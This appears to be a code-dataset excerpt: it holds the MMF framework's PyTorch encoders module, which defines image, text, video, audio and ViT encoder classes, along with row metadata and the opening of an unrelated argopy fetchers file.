class FRCNNImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "frcnn"
pretrained: bool = True
pretrained_path: str = None
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
pretrained = config.get("pretrained", False)
pretrained_path = config.get("pretrained_path", None)
self.frcnn = GeneralizedRCNN(config)
if pretrained:
state_dict = torch.load(pretrained_path)
self.frcnn.load_state_dict(state_dict)
self.frcnn.eval()
def forward(
self,
x: torch.Tensor,
sizes: torch.Tensor = None,
scales_yx: torch.Tensor = None,
padding: torch.Tensor = None,
max_detections: int = 0,
return_tensors: str = "pt",
):
x = self.frcnn(
x,
sizes,
scales_yx=scales_yx,
padding=padding,
max_detections=max_detections,
return_tensors=return_tensors,
)
return x
class TextEncoderTypes(Enum):
identity = "identity"
transformer = "transformer"
embedding = "embedding"
class TextEncoderFactory(EncoderFactory):
@dataclass
class Config(EncoderFactory.Config):
# identity, transformer or embedding as of now
type: TextEncoderTypes = MISSING
params: Encoder.Config = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self._type = config.type
if isinstance(self._type, TextEncoderTypes):
self._type = self._type.value
if self._type == "identity":
self.module = nn.Identity()
elif self._type == "transformer":
self._module = TransformerEncoder(config.params)
self.module = self._module.module
elif self._type == "embedding":
self.module = TextEmbeddingEncoder(config.params)
else:
raise NotImplementedError(f"Unknown Text Encoder {self._type}")
def forward(self, *args, **kwargs):
return self.module(*args, **kwargs)
@registry.register_encoder("text_embedding")
class TextEmbeddingEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "text_embedding"
operator: str = MISSING
# Keeping this Any for now as this
# needs a separate refactor PR.
embedding_params: Any = MISSING
def __init__(self, config: Config):
super().__init__()
self._operator = config.operator
self._embedding_params = config.embedding_params
self.module = TextEmbedding(
self._embedding_params.type, **self._embedding_params.params
)
def forward(self, x):
x = self.module(x)
if self._operator == "sum":
x = x.sum(dim=1)
elif self._operator == "concat":
x = torch.cat(x, dim=1)
elif self._operator == "mul":
x = torch.prod(x, dim=1)
return x.squeeze()
@registry.register_encoder("transformer")
class TransformerEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "transformer"
num_segments: int = 2
bert_model_name: str = "bert-base-uncased"
# Options below can be overridden to update the bert configuration used
# to initialize the bert encoder. If some option is missing or
# if you are using an encoder different then BERT, add extra parameters
# by inheriting and extending this config
# Those options will automatically override the options for your transformer
# encoder's configuration. For e.g. vocab_size is missing here, just add
# vocab_size: x to update the size of the vocabulary with which encoder is
# initialized. If you update the default values, the transformer you
# will get will be initialized from scratch.
hidden_size: int = 768
num_hidden_layers: int = 12
num_attention_heads: int = 12
output_attentions: bool = False
output_hidden_states: bool = False
random_init: bool = False
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
hf_params = {"config": self._build_encoder_config(config)}
should_random_init = self.config.get("random_init", False)
# For BERT models, initialize using Jit version
if self.config.bert_model_name.startswith("bert-"):
if should_random_init:
self.module = BertModelJit(**hf_params)
else:
self.module = BertModelJit.from_pretrained(
self.config.bert_model_name, **hf_params
)
else:
if should_random_init:
self.module = AutoModel.from_config(**hf_params)
else:
self.module = AutoModel.from_pretrained(
self.config.bert_model_name, **hf_params
)
self.embeddings = self.module.embeddings
self.original_config = self.config
self.config = self.module.config
self._init_segment_embeddings()
def _init_segment_embeddings(self):
if self.original_config.get("num_segments", None):
num_segments = self.original_config.num_segments
if hasattr(self.embeddings, "token_type_embeddings"):
new_embeds = nn.Embedding(num_segments, self.config.hidden_size)
new_embeds.weight.data[:2].copy_(
self.embeddings.token_type_embeddings.weight
)
for idx in range(2, num_segments - 1):
new_embeds.weight.data[idx].copy_(
self.embeddings.token_type_embeddings.weight.data.mean(dim=0)
)
self.embeddings.token_type_embeddings = new_embeds
def _build_encoder_config(self, config: Config):
return AutoConfig.from_pretrained(
config.bert_model_name, **OmegaConf.to_container(config)
)
def forward(self, *args, return_sequence=False, **kwargs) -> Tensor:
# Only return pooled output
output = self.module(*args, **kwargs)
return output[0] if return_sequence else output[1]
class MultiModalEncoderBase(Encoder):
__jit_unused_properties__ = ["encoder_config"]
@dataclass
class Config(Encoder.Config):
# This actually is Union[ImageEncoderConfig, ImageFeatureEncoderConfig]
modal_encoder: EncoderFactory.Config = ImageEncoderFactory.Config(
type=ImageEncoderTypes.resnet152, params=ResNet152ImageEncoder.Config()
)
text_encoder: EncoderFactory.Config = TextEncoderFactory.Config(
type=TextEncoderTypes.transformer, params=TransformerEncoder.Config()
)
direct_features_input: bool = False
modal_hidden_size: int = 2048
text_hidden_size: int = 768
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
self._modal_encoder_config = self.config.get("modal_encoder", None)
self._is_direct_features_input = self.config.get("direct_features_input", False)
self.build()
self.modal_hidden_size = self.config.get("modal_hidden_size", None)
self.text_hidden_size = self.config.get("text_hidden_size", None)
def build(self):
encoders = self._build_encoders(self.config)
self.text_encoder, self.modal_encoder = encoders[0], encoders[1]
self._encoder_config = None
if self.text_encoder:
self._encoder_config = self.text_encoder.config
@property
def encoder_config(self):
return self._encoder_config
def _build_encoders(self, config):
text_encoder = None
if config.get("text_encoder", None):
text_encoder = build_text_encoder(config.text_encoder)
modal_encoder = None
if config.get("modal_encoder", None):
modal_encoder = self._build_modal_encoder(config.modal_encoder)
return (text_encoder, modal_encoder)
def _build_modal_encoder(self, config):
return build_image_encoder(
config, direct_features=self._is_direct_features_input
)
class PooledEncoder(Encoder):
"""
Standard pooled encoder class which takes in an input, encodes it with an encoder
implemented and returned from `self.build_encoder` function, pools it based
`pool_type` and `num_output_features` specified, flattens it and returns it
back as a tensor.
"""
@dataclass
class Config(Encoder.Config):
num_output_features: int = 1 # How many output features need to be returned.
pool_type: str = "avg" # type of pooling to apply "avg" | "adaptive"
out_dim: int = MISSING # size of out dim expected
three_d: bool = False # if input requires 3D pooling (for video)
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.encoder = self.build_encoder(config)
pool_func = (
nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
)
params = (config.num_output_features, 1)
if config.three_d:
pool_func = (
nn.AdaptiveAvgPool3d
if config.pool_type == "avg"
else nn.AdaptiveMaxPool3d
)
params = (config.num_output_features, 1, 1)
# -1 will keep the original feature size
if config.num_output_features == -1:
self.pool = nn.Identity()
else:
self.pool = pool_func(params)
self.out_dim = config.out_dim
def build_encoder(self, config: Config, *args, **kwargs):
"""Build an encoder on whose output the pooling will be applied.
Args:
config (Config): Config parameter required to build the encoder.
Raises:
NotImplementedError: Not implemented by default.
"""
raise NotImplementedError()
def forward(self, x: Tensor) -> Tensor:
out = self.encoder(x)
out = self.pool(out)
out = torch.flatten(out, start_dim=2)
out = out.transpose(1, 2).contiguous()
return out
@registry.register_encoder("pytorchvideo")
class PytorchVideoEncoder(Encoder):
"""A thin wrapper around pytorchvideo models.
This class is responsible for integrating pytorchvideo models as encoders.
THis class attempts to construct a pytorchvideo model from torch hub.
If this fails for a random weight model, and pytorchvideo package is available,
build the model with random weights from pytorchvideo.models.
Config:
name (str): Always 'pytorchvideo' Used for builder_encoder()
random_init (bool): Flag to load pretrained weights
model_name (str): Name of the pytorchvideo model to use
drop_last_n_layers (int):
<=0 value for the number of layers to drop off the end
pooler_name (str): Name of pooler used on model output
Raises:
ImportError:
The constructor raises an ImportError if pytorchvideo is not installed.
"""
@dataclass
class Config(Encoder.Config):
name: str = "pytorchvideo"
random_init: bool = False
model_name: str = "slowfast_r50"
drop_last_n_layers: int = -1
pooler_name: str = "identity"
PYTORCHVIDEO_REPO = "facebookresearch/pytorchvideo:main"
def __init__(self, config: Config):
super().__init__()
config = OmegaConf.create({**asdict(self.Config()), **config})
if config.random_init:
params = dict(**OmegaConf.to_container(config))
params = {
k: v
for k, v in params.items()
if k not in PytorchVideoEncoder.Config().__dict__
}
try:
model = torch.hub.load(
PytorchVideoEncoder.PYTORCHVIDEO_REPO,
model=config.model_name,
pretrained=False,
**params,
)
except BaseException as err:
pytorchvideo_spec = importlib.util.find_spec("pytorchvideo")
if pytorchvideo_spec is None:
raise err
import pytorchvideo.models.hub as hub
model_create_fn = getattr(hub, config.model_name)
model = model_create_fn(pretrained=False, **params)
else:
# load weights from TorchHub
model = torch.hub.load(
PytorchVideoEncoder.PYTORCHVIDEO_REPO,
model=config.model_name,
pretrained=True,
)
encoder_list = []
if config.drop_last_n_layers == 0:
encoder_list += [model]
else:
modules_list = list(model.children())
if len(modules_list) == 1:
modules_list = list(modules_list[0].children())
modules = modules_list[: config.drop_last_n_layers]
encoder_list += modules
pooler = registry.get_pool_class(config.pooler_name)()
encoder_list += [pooler]
self.encoder = nn.Sequential(*encoder_list)
def forward(self, *args, **kwargs):
# pass along input to model
# assumes caller obeys the dynamic model signature
return self.encoder(*args, **kwargs)
@registry.register_encoder("r2plus1d_18")
class R2Plus1D18VideoEncoder(PooledEncoder):
"""
R2Plus1D based video encoder. Returns back a tensor of dim 2048.
By default, pretrained version is used.
See https://arxiv.org/abs/1711.11248.
"""
@dataclass
class Config(PooledEncoder.Config):
name: str = "r2plus1d_18"
out_dim: int = 512 # out dim
pretrained: bool = True # if should use pretrained version or not
three_d: bool = True
def build_encoder(self, config: Config, *args, **kwargs):
model = torchvision.models.video.r2plus1d_18(
pretrained=config.get("pretrained", True)
)
modules = list(model.children())[:-2]
return nn.Sequential(*modules)
@registry.register_encoder("resnet18_audio")
class ResNet18AudioEncoder(PooledEncoder):
"""
Audio encoder based on ResNet18 used in various audio classification paper
as a baseline. By default, not pretrained version is used.
"""
@dataclass
class Config(PooledEncoder.Config):
name: str = "resnet18_audio"
out_dim: int = 512
pretrained: bool = False
def build_encoder(self, config: Config, *args, **kwargs):
model = torchvision.models.resnet18(pretrained=config.get("pretrained", False))
model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
modules = list(model.children())[:-2]
return nn.Sequential(*modules)
@registry.register_encoder("vit")
class ViTEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "vit"
# See https://huggingface.co/models?filter=vit for available options
pretrained_model_name: str = "google/vit-base-patch16-224"
random_init: bool = False
gradient_checkpointing: bool = False
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
self.module, self.hf_config = self._model_class.from_config(config)
self.embeddings = self.module.embeddings
self.out_dim = self.hf_config.hidden_size
@property
def _model_class(self):
from mmf.modules.vit import ViTModel
return ViTModel
def forward(self, *args, **kwargs):
if "output_hidden_states" not in kwargs:
kwargs["output_hidden_states"] = False
output = self.module(*args, **kwargs)
return output["last_hidden_state"], output.get("hidden_states", None)
| 34.763251 | 88 | 0.630345 |
import importlib
import logging
import os
import pickle
import re
from collections import OrderedDict
from copy import deepcopy
from dataclasses import asdict, dataclass
from enum import Enum
from typing import Any
import torch
import torchvision
from mmf.common.registry import registry
from mmf.models.frcnn import GeneralizedRCNN
from mmf.modules.embeddings import ProjectionEmbedding, TextEmbedding
from mmf.modules.hf_layers import BertModelJit
from mmf.modules.layers import Identity
from mmf.utils.build import build_image_encoder, build_text_encoder
from mmf.utils.download import download_pretrained_model
from mmf.utils.file_io import PathManager
from mmf.utils.general import get_absolute_path
from mmf.utils.logger import log_class_usage
from omegaconf import MISSING, OmegaConf
from torch import nn, Tensor
from transformers.configuration_auto import AutoConfig
from transformers.modeling_auto import AutoModel
try:
from detectron2.modeling import build_resnet_backbone, ShapeSpec
except ImportError:
pass
logger = logging.getLogger()
class Encoder(nn.Module):
@dataclass
class Config:
name: str = MISSING
def __init__(self):
super().__init__()
log_class_usage("Encoder", self.__class__)
@classmethod
def from_params(cls, **kwargs):
config = OmegaConf.structured(cls.Config(**kwargs))
return cls(config)
class EncoderFactory(nn.Module):
@dataclass
class Config:
type: str = MISSING
params: Encoder.Config = MISSING
class ImageFeatureEncoderTypes(Enum):
default = "default"
identity = "identity"
projection = "projection"
frcnn_fc7 = "finetune_faster_rcnn_fpn_fc7"
class ImageFeatureEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
in_dim: int = MISSING
class ImageFeatureEncoderFactory(EncoderFactory):
@dataclass
class Config(EncoderFactory.Config):
type: ImageFeatureEncoderTypes = MISSING
params: ImageFeatureEncoder.Config = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
encoder_type = config.type
if isinstance(encoder_type, ImageFeatureEncoderTypes):
encoder_type = encoder_type.value
assert (
"in_dim" in config.params
), "ImageFeatureEncoder require 'in_dim' param in config"
params = config.params
if encoder_type == "default" or encoder_type == "identity":
self.module = Identity()
self.module.in_dim = params.in_dim
self.module.out_dim = params.in_dim
elif encoder_type == "projection":
if "module" not in params:
params = deepcopy(params)
params.module = "linear"
self.module = ProjectionEmbedding(**params)
elif encoder_type == "finetune_faster_rcnn_fpn_fc7":
self.module = FinetuneFasterRcnnFpnFc7(params)
else:
raise NotImplementedError("Unknown Image Encoder: %s" % encoder_type)
self.out_dim = self.module.out_dim
def forward(self, *args, **kwargs):
return self.module(*args, **kwargs)
@registry.register_encoder("finetune_faster_rcnn_fpn_fc7")
class FinetuneFasterRcnnFpnFc7(ImageFeatureEncoder):
@dataclass
class Config(ImageFeatureEncoder.Config):
name: str = "finetune_faster_rcnn_fpn_fc7"
in_dim: int = MISSING
weights_file: str = "fc7_w.pkl"
bias_file: str = "fc7_b.pkl"
model_data_dir: str = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
model_data_dir = get_absolute_path(config.model_data_dir)
if not os.path.isabs(config.weights_file):
weights_file = os.path.join(model_data_dir, config.weights_file)
if not os.path.isabs(config.bias_file):
bias_file = os.path.join(model_data_dir, config.bias_file)
if not PathManager.exists(bias_file) or not PathManager.exists(weights_file):
download_path = download_pretrained_model("detectron.vmb_weights")
weights_file = get_absolute_path(os.path.join(download_path, "fc7_w.pkl"))
bias_file = get_absolute_path(os.path.join(download_path, "fc7_b.pkl"))
with PathManager.open(weights_file, "rb") as w:
weights = pickle.load(w)
with PathManager.open(bias_file, "rb") as b:
bias = pickle.load(b)
out_dim = bias.shape[0]
self.lc = nn.Linear(config.in_dim, out_dim)
self.lc.weight.data.copy_(torch.from_numpy(weights))
self.lc.bias.data.copy_(torch.from_numpy(bias))
self.out_dim = out_dim
def _load_from_state_dict(
self,
state_dict,
prefix,
local_metadata,
strict,
missing_keys,
unexpected_keys,
error_msgs,
):
old_prefix = prefix + "module."
for k in list(state_dict.keys()):
if k.startswith(old_prefix):
new_k = k.replace(old_prefix, prefix)
state_dict[new_k] = state_dict.pop(k)
super()._load_from_state_dict(
state_dict,
prefix,
local_metadata,
strict,
missing_keys,
unexpected_keys,
error_msgs,
)
def forward(self, image):
i2 = self.lc(image)
i3 = nn.functional.relu(i2)
return i3
@registry.register_encoder("identity")
class IdentityEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "identity"
in_dim: int = 100
def __init__(self, config: Config):
super().__init__()
self.module = nn.Identity()
self.in_dim = config.get("in_dim", 100)
self.out_dim = self.in_dim
def forward(self, x):
return self.module(x)
class ImageEncoderTypes(Enum):
default = "default"
identity = "identity"
torchvision_resnet = "torchvision_resnet"
resnet152 = "resnet152"
detectron2_resnet = "detectron2_resnet"
class ImageEncoderFactory(EncoderFactory):
@dataclass
class Config(EncoderFactory.Config):
type: ImageEncoderTypes = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self._type = config.type
if isinstance(self._type, ImageEncoderTypes):
self._type = self._type.value
params = config.params
if self._type == "default" or self._type == "identity":
self.module = nn.Identity()
self.module.out_dim = params.in_dim
elif self._type == "resnet152":
self.module = ResNet152ImageEncoder(params)
elif self._type == "torchvision_resnet":
self.module = TorchvisionResNetImageEncoder(params)
elif self._type == "detectron2_resnet":
self.module = Detectron2ResnetImageEncoder(params)
elif self._type == "frcnn":
self.module = FRCNNImageEncoder(params)
else:
raise NotImplementedError("Unknown Image Encoder: %s" % self._type)
@property
def out_dim(self):
return self.module.out_dim
def forward(self, image):
return self.module(image)
@registry.register_encoder("resnet152")
class ResNet152ImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "resnet152"
pretrained: bool = True
pool_type: str = "avg"
num_output_features: int = 1
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
model = torchvision.models.resnet152(pretrained=config.get("pretrained", True))
modules = list(model.children())[:-2]
self.model = nn.Sequential(*modules)
pool_func = (
nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
)
if config.num_output_features == -1:
self.pool = nn.Identity()
elif config.num_output_features in [1, 2, 3, 5, 7]:
self.pool = pool_func((config.num_output_features, 1))
elif config.num_output_features == 4:
self.pool = pool_func((2, 2))
elif config.num_output_features == 6:
self.pool = pool_func((3, 2))
elif config.num_output_features == 8:
self.pool = pool_func((4, 2))
elif config.num_output_features == 9:
self.pool = pool_func((3, 3))
self.out_dim = 2048
def forward(self, x):
out = self.pool(self.model(x))
out = torch.flatten(out, start_dim=2)
out = out.transpose(1, 2).contiguous()
return out
@registry.register_encoder("torchvision_resnet")
class TorchvisionResNetImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "resnet50"
pretrained: bool = False
zero_init_residual: bool = True
num_output_features: int = -1
pool_type: str = "avg"
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
model = getattr(torchvision.models, config.name)(
pretrained=config.pretrained, zero_init_residual=config.zero_init_residual
)
self.use_avgpool = config.get("use_avgpool", None)
if self.use_avgpool:
config.num_output_features = 1
config.pool_type = "avg"
elif self.use_avgpool is False:
config.num_output_features = -1
if config.pretrained:
model = self._load_pretrained(model, config)
modules = list(model.children())[:-2]
self.model = nn.Sequential(*modules)
self.pool = self._pool_func(config)
self.out_dim = config.get("out_dim", 2048)
def _load_pretrained(self, model, config: Config):
pretrained_model = config.get("pretrained_model", "supervised")
if pretrained_model == "supervised":
pass
elif os.path.exists(pretrained_model):
model.load_state_dict(torch.load(pretrained_model))
else:
try:
with PathManager.open(pretrained_model, "rb") as f:
model.load_state_dict(
torch.load(f, map_location=lambda storage, loc: storage),
strict=False,
)
except Exception:
raise Exception(f"unknown pretrained ResNet model: {pretrained_model}")
return model
def _pool_func(self, config: Config):
pool_func = (
nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
)
if config.num_output_features == -1:
pool = nn.Identity()
elif config.num_output_features in [1, 2, 3, 5, 7]:
pool = pool_func((config.num_output_features, 1))
elif config.num_output_features == 4:
pool = pool_func((2, 2))
elif config.num_output_features == 6:
pool = pool_func((3, 2))
elif config.num_output_features == 8:
pool = pool_func((4, 2))
elif config.num_output_features == 9:
pool = pool_func((3, 3))
return pool
def forward(self, x):
out = self.pool(self.model(x))
if self.use_avgpool is None:
out = torch.flatten(out, start_dim=2)
out = out.transpose(1, 2).contiguous()
else:
out = torch.flatten(out, start_dim=1)
return out
@registry.register_encoder("detectron2_resnet")
class Detectron2ResnetImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "detectron2_resnet"
pretrained: bool = True
pretrained_path: str = None
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
pretrained = config.get("pretrained", False)
pretrained_path = config.get("pretrained_path", None)
self.resnet = build_resnet_backbone(config, ShapeSpec(channels=3))
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(
pretrained_path, progress=False
)
new_state_dict = OrderedDict()
replace_layer = {"backbone.": ""}
for key, value in state_dict["model"].items():
new_key = re.sub(
r"(backbone\.)", lambda x: replace_layer[x.groups()[0]], key
)
new_state_dict[new_key] = value
self.resnet.load_state_dict(new_state_dict, strict=False)
self.out_dim = 2048
def forward(self, x):
x = self.resnet(x)
return x["res5"]
@registry.register_encoder("frcnn")
class FRCNNImageEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "frcnn"
pretrained: bool = True
pretrained_path: str = None
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
pretrained = config.get("pretrained", False)
pretrained_path = config.get("pretrained_path", None)
self.frcnn = GeneralizedRCNN(config)
if pretrained:
state_dict = torch.load(pretrained_path)
self.frcnn.load_state_dict(state_dict)
self.frcnn.eval()
def forward(
self,
x: torch.Tensor,
sizes: torch.Tensor = None,
scales_yx: torch.Tensor = None,
padding: torch.Tensor = None,
max_detections: int = 0,
return_tensors: str = "pt",
):
x = self.frcnn(
x,
sizes,
scales_yx=scales_yx,
padding=padding,
max_detections=max_detections,
return_tensors=return_tensors,
)
return x
class TextEncoderTypes(Enum):
identity = "identity"
transformer = "transformer"
embedding = "embedding"
class TextEncoderFactory(EncoderFactory):
@dataclass
class Config(EncoderFactory.Config):
type: TextEncoderTypes = MISSING
params: Encoder.Config = MISSING
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self._type = config.type
if isinstance(self._type, TextEncoderTypes):
self._type = self._type.value
if self._type == "identity":
self.module = nn.Identity()
elif self._type == "transformer":
self._module = TransformerEncoder(config.params)
self.module = self._module.module
elif self._type == "embedding":
self.module = TextEmbeddingEncoder(config.params)
else:
raise NotImplementedError(f"Unknown Text Encoder {self._type}")
def forward(self, *args, **kwargs):
return self.module(*args, **kwargs)
@registry.register_encoder("text_embedding")
class TextEmbeddingEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "text_embedding"
operator: str = MISSING
embedding_params: Any = MISSING
def __init__(self, config: Config):
super().__init__()
self._operator = config.operator
self._embedding_params = config.embedding_params
self.module = TextEmbedding(
self._embedding_params.type, **self._embedding_params.params
)
def forward(self, x):
x = self.module(x)
if self._operator == "sum":
x = x.sum(dim=1)
elif self._operator == "concat":
x = torch.cat(x, dim=1)
elif self._operator == "mul":
x = torch.prod(x, dim=1)
return x.squeeze()
@registry.register_encoder("transformer")
class TransformerEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "transformer"
num_segments: int = 2
bert_model_name: str = "bert-base-uncased"
# vocab_size: x to update the size of the vocabulary with which encoder is
# initialized. If you update the default values, the transformer you
# will get will be initialized from scratch.
hidden_size: int = 768
num_hidden_layers: int = 12
num_attention_heads: int = 12
output_attentions: bool = False
output_hidden_states: bool = False
random_init: bool = False
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
hf_params = {"config": self._build_encoder_config(config)}
should_random_init = self.config.get("random_init", False)
# For BERT models, initialize using Jit version
if self.config.bert_model_name.startswith("bert-"):
if should_random_init:
self.module = BertModelJit(**hf_params)
else:
self.module = BertModelJit.from_pretrained(
self.config.bert_model_name, **hf_params
)
else:
if should_random_init:
self.module = AutoModel.from_config(**hf_params)
else:
self.module = AutoModel.from_pretrained(
self.config.bert_model_name, **hf_params
)
self.embeddings = self.module.embeddings
self.original_config = self.config
self.config = self.module.config
self._init_segment_embeddings()
def _init_segment_embeddings(self):
if self.original_config.get("num_segments", None):
num_segments = self.original_config.num_segments
if hasattr(self.embeddings, "token_type_embeddings"):
new_embeds = nn.Embedding(num_segments, self.config.hidden_size)
new_embeds.weight.data[:2].copy_(
self.embeddings.token_type_embeddings.weight
)
for idx in range(2, num_segments - 1):
new_embeds.weight.data[idx].copy_(
self.embeddings.token_type_embeddings.weight.data.mean(dim=0)
)
self.embeddings.token_type_embeddings = new_embeds
def _build_encoder_config(self, config: Config):
return AutoConfig.from_pretrained(
config.bert_model_name, **OmegaConf.to_container(config)
)
def forward(self, *args, return_sequence=False, **kwargs) -> Tensor:
# Only return pooled output
output = self.module(*args, **kwargs)
return output[0] if return_sequence else output[1]
class MultiModalEncoderBase(Encoder):
__jit_unused_properties__ = ["encoder_config"]
@dataclass
class Config(Encoder.Config):
# This actually is Union[ImageEncoderConfig, ImageFeatureEncoderConfig]
modal_encoder: EncoderFactory.Config = ImageEncoderFactory.Config(
type=ImageEncoderTypes.resnet152, params=ResNet152ImageEncoder.Config()
)
text_encoder: EncoderFactory.Config = TextEncoderFactory.Config(
type=TextEncoderTypes.transformer, params=TransformerEncoder.Config()
)
direct_features_input: bool = False
modal_hidden_size: int = 2048
text_hidden_size: int = 768
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
self._modal_encoder_config = self.config.get("modal_encoder", None)
self._is_direct_features_input = self.config.get("direct_features_input", False)
self.build()
self.modal_hidden_size = self.config.get("modal_hidden_size", None)
self.text_hidden_size = self.config.get("text_hidden_size", None)
def build(self):
encoders = self._build_encoders(self.config)
self.text_encoder, self.modal_encoder = encoders[0], encoders[1]
self._encoder_config = None
if self.text_encoder:
self._encoder_config = self.text_encoder.config
@property
def encoder_config(self):
return self._encoder_config
def _build_encoders(self, config):
text_encoder = None
if config.get("text_encoder", None):
text_encoder = build_text_encoder(config.text_encoder)
modal_encoder = None
if config.get("modal_encoder", None):
modal_encoder = self._build_modal_encoder(config.modal_encoder)
return (text_encoder, modal_encoder)
def _build_modal_encoder(self, config):
return build_image_encoder(
config, direct_features=self._is_direct_features_input
)
class PooledEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
num_output_features: int = 1 # How many output features need to be returned.
pool_type: str = "avg" # type of pooling to apply "avg" | "adaptive"
out_dim: int = MISSING # size of out dim expected
three_d: bool = False # if input requires 3D pooling (for video)
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.encoder = self.build_encoder(config)
pool_func = (
nn.AdaptiveAvgPool2d if config.pool_type == "avg" else nn.AdaptiveMaxPool2d
)
params = (config.num_output_features, 1)
if config.three_d:
pool_func = (
nn.AdaptiveAvgPool3d
if config.pool_type == "avg"
else nn.AdaptiveMaxPool3d
)
params = (config.num_output_features, 1, 1)
# -1 will keep the original feature size
if config.num_output_features == -1:
self.pool = nn.Identity()
else:
self.pool = pool_func(params)
self.out_dim = config.out_dim
def build_encoder(self, config: Config, *args, **kwargs):
raise NotImplementedError()
def forward(self, x: Tensor) -> Tensor:
out = self.encoder(x)
out = self.pool(out)
out = torch.flatten(out, start_dim=2)
out = out.transpose(1, 2).contiguous()
return out
@registry.register_encoder("pytorchvideo")
class PytorchVideoEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "pytorchvideo"
random_init: bool = False
model_name: str = "slowfast_r50"
drop_last_n_layers: int = -1
pooler_name: str = "identity"
PYTORCHVIDEO_REPO = "facebookresearch/pytorchvideo:main"
def __init__(self, config: Config):
super().__init__()
config = OmegaConf.create({**asdict(self.Config()), **config})
if config.random_init:
params = dict(**OmegaConf.to_container(config))
params = {
k: v
for k, v in params.items()
if k not in PytorchVideoEncoder.Config().__dict__
}
try:
model = torch.hub.load(
PytorchVideoEncoder.PYTORCHVIDEO_REPO,
model=config.model_name,
pretrained=False,
**params,
)
except BaseException as err:
pytorchvideo_spec = importlib.util.find_spec("pytorchvideo")
if pytorchvideo_spec is None:
raise err
import pytorchvideo.models.hub as hub
model_create_fn = getattr(hub, config.model_name)
model = model_create_fn(pretrained=False, **params)
else:
# load weights from TorchHub
model = torch.hub.load(
PytorchVideoEncoder.PYTORCHVIDEO_REPO,
model=config.model_name,
pretrained=True,
)
encoder_list = []
if config.drop_last_n_layers == 0:
encoder_list += [model]
else:
modules_list = list(model.children())
if len(modules_list) == 1:
modules_list = list(modules_list[0].children())
modules = modules_list[: config.drop_last_n_layers]
encoder_list += modules
pooler = registry.get_pool_class(config.pooler_name)()
encoder_list += [pooler]
self.encoder = nn.Sequential(*encoder_list)
def forward(self, *args, **kwargs):
# pass along input to model
# assumes caller obeys the dynamic model signature
return self.encoder(*args, **kwargs)
@registry.register_encoder("r2plus1d_18")
class R2Plus1D18VideoEncoder(PooledEncoder):
@dataclass
class Config(PooledEncoder.Config):
name: str = "r2plus1d_18"
out_dim: int = 512 # out dim
pretrained: bool = True # if should use pretrained version or not
three_d: bool = True
def build_encoder(self, config: Config, *args, **kwargs):
model = torchvision.models.video.r2plus1d_18(
pretrained=config.get("pretrained", True)
)
modules = list(model.children())[:-2]
return nn.Sequential(*modules)
@registry.register_encoder("resnet18_audio")
class ResNet18AudioEncoder(PooledEncoder):
@dataclass
class Config(PooledEncoder.Config):
name: str = "resnet18_audio"
out_dim: int = 512
pretrained: bool = False
def build_encoder(self, config: Config, *args, **kwargs):
model = torchvision.models.resnet18(pretrained=config.get("pretrained", False))
model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
modules = list(model.children())[:-2]
return nn.Sequential(*modules)
@registry.register_encoder("vit")
class ViTEncoder(Encoder):
@dataclass
class Config(Encoder.Config):
name: str = "vit"
# See https://huggingface.co/models?filter=vit for available options
pretrained_model_name: str = "google/vit-base-patch16-224"
random_init: bool = False
gradient_checkpointing: bool = False
def __init__(self, config: Config, *args, **kwargs):
super().__init__()
self.config = config
self.module, self.hf_config = self._model_class.from_config(config)
self.embeddings = self.module.embeddings
self.out_dim = self.hf_config.hidden_size
@property
def _model_class(self):
from mmf.modules.vit import ViTModel
return ViTModel
def forward(self, *args, **kwargs):
if "output_hidden_states" not in kwargs:
kwargs["output_hidden_states"] = False
output = self.module(*args, **kwargs)
return output["last_hidden_state"], output.get("hidden_states", None)
| true | true |
f725fbcb3a31eaf8eff4449388e052cf673f2915 | 15,435 | py | Python | argopy/fetchers.py | dhruvbalwada/argopy | 66a0b38ab5024d2ff2b7055e0e9b1c62837023a1 | [
"Apache-2.0"
] | null | null | null | argopy/fetchers.py | dhruvbalwada/argopy | 66a0b38ab5024d2ff2b7055e0e9b1c62837023a1 | [
"Apache-2.0"
] | null | null | null | argopy/fetchers.py | dhruvbalwada/argopy | 66a0b38ab5024d2ff2b7055e0e9b1c62837023a1 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python
# -*coding: UTF-8 -*-
"""
High level helper methods to load Argo data from any source
